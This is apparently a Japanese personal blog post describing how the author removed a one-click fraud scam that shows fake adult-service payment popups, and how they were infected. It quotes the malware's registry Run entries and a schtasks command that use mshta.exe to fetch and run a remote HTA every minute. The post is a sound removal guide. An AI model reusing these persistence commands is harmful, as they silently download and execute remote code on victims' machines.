うかつなことに、いわゆるワンクリで無料のアレな画像が見られるフリをしてクリックさせ、次回再起動時からひたすらデスクトップに「アダルト動画サービスを利用されました。料金のお支払期限は○○です」というアレなポップアップを出し続ける、あのウザイやつに引っかかりましたですよ、ええ。
必ず同じことで困っている方がいらっしゃると思いますので以下に対処方法を記載します。
また下記のブログ記事を大変参考にさせていただきました。
「mshta.exeによるワンクリック不正請求詐欺サイト」
大変わかりやすく書いてありますので、私の下記の文章を読むより先にお読みになったほうがいいかもしれません。
ワタクシほどの猛者になりますと(笑)、その表示が出るようになるまでに一度もメールアドレスや名前やクレジットカード番号なんかは入力していないことは確認済みなので、ポップアップを下手げにクリックしてしまわなければ問題ないのはとっくに了解済み。だが、とにかく消しても消しても毎分起動するので邪魔で仕方がない。
抜かりのないことに、裏でmshta.exeが起動したこともわかっているので早速駆除を始めることにする。
1.レジストリの自動起動にmshtaを呼んでいるものがないか確認。
RegeditでHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runのエントリを確認してそれっぽいエントリがないか調べる…のも正解だけど、ここは HiJackThisを使って O4 のエントリを見るのが楽。
(解説は、この分野の権威「アダ被」さんからどうぞ)
で、案の定みつかりました。(今回はHKLM配下じゃなくてHKCU配下でした)
O4 - HKCU\..\Run: [Quicktime] C:\Windows\system32\mshta.exe http://video-abcd.info/User/bill7
O4 - HKCU\..\Run: [Quicktime-3] schtasks /create /TN Quicktime /tr "C:\Windows\system32\mshta http://video-abcd.info/User/bill7" /F /sc minute /mo 1
こしゃくなことに[Quicktime-3]なんて名前を偽装していますが、引数にモロなURLが載ってるので明らかにこれです。schtasksに /sc minute と指定しているので毎分実行するというスケジュール設定になっています。
このエントリを削除します。
おや?2番目のをよく見ると、schtasksでなにやらスケジュール設定を作ってますね、これ。ということで以下も実施です。
2. Windows Taskを確認する
\Windows\System32\Tasks フォルダを開きます。
名前だけではわかりにくいのですが、ファイルの更新日付を見て、ちょうどワンクリに引っかかったらしき日付のファイルが存在していないか調べます。いきなり削除すると間違っていたときに危険ですので、一時的にTasksフォルダから他の場所(たとえばデスクトップ)にドラッグして移動してみます。これで2-3分待ってみて表示が出なくなればそれがビンゴです。
今回のやつはやはりQuicktimeという名前で存在していました。
念のため中身を wordpad.exeで見てみるとまちがいなくこれです。
Execタグの中に mshtaとURLが記載されていました。
ということで、この2段構えで駆除完了でした。
今後のために、これに引っかかった経路を思い出しながら記載しておきます。
1.グーグル画像検索で画像を検索
2.無料動画紹介ブログがヒット
3.お目当ての画像がクリッカブルボタンになっており「無料動画を再生する」のようなことが書いてある
4.クリックすると、ぱっと見どこにも料金っぽいことが書いていないポップアップが起動する。
(これが hta アプリケーション)
5.どこをどう見てもただの成人認証画面で「年齢確認」と「規約への同意」を求めるラジオボタンがある。
6.それぞれ同意するを選び、最後にでかいボタンを押すと、なにやらスクリプトを実行しているっぽい画面が開いた後「あなたは複数回の意思確認の後サービスの利用に同意しました。利用料のお支払いは…云々」というポップアップが開き、以後定期的に支払い方法や支払い期限なるものを表示するポップアップが表示される。
こういう流れでしたね。ちょっと油断してました。皆さんもご注意ください。ちなみにこんな過程で「契約成立」といわれてもまったく契約は無効ですので、あわてず騒がずポップアップの駆除を行ってください。そういえばこの系統だと、NortonもSpybot S&Dも検出してくれなかったですね。